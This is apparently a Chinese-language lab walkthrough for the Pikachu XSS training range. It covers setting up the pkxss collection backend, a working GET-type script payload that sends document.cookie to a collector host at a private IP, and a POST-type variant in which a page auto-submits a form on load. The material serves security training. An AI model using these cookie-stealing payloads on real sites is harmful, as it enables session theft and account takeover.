xss案例
- cookie的竊取和利用
- 釣魚攻擊
- Xss獲取鍵盤記錄
在進行案例之前首先要搭建xss后台
搭建xss后台
1.在pikachu文件夾下面,把pkxss單獨放在www下面
2.修改配置文件 數據庫服務器地址,賬號,密碼.
3.登錄
4.安裝
5.修改 重定向到一個可信的網站
案例一:
get型xss cookie值獲取
修改輸入長度
輸入框輸入
<script>document.location='http://192.168.27.156/pkxss/xcookie/cookie.php?cookie=' +document.cookie;</script> 提交
就會跳轉到首頁面
回到pxss那個界面 刷新 得到cookie值
其中referer
用戶一旦訪問這個鏈接,它只會跳轉到首頁面,但是我們這樣就已經獲取到cookie值
post型xss cookie值獲取
自己可以搭建一個站點,里面寫入惡意的post表單,將這個鏈接(http://192.168.1.5/post.html)發送給用戶,用戶點擊之后,后面就跟上一個一樣了
首先登陸
查看pkxss-xcookie-post.html文件
就是一旦加載頁面,window.onload就會獲取下面的表單,然后click就是點擊提交,用戶訪問頁面時候就會達到自動發送post請求的目的
用戶訪問欺騙的跳轉頁面(http://192.168.1.5/post.html),就會在pxss獲取到cookie值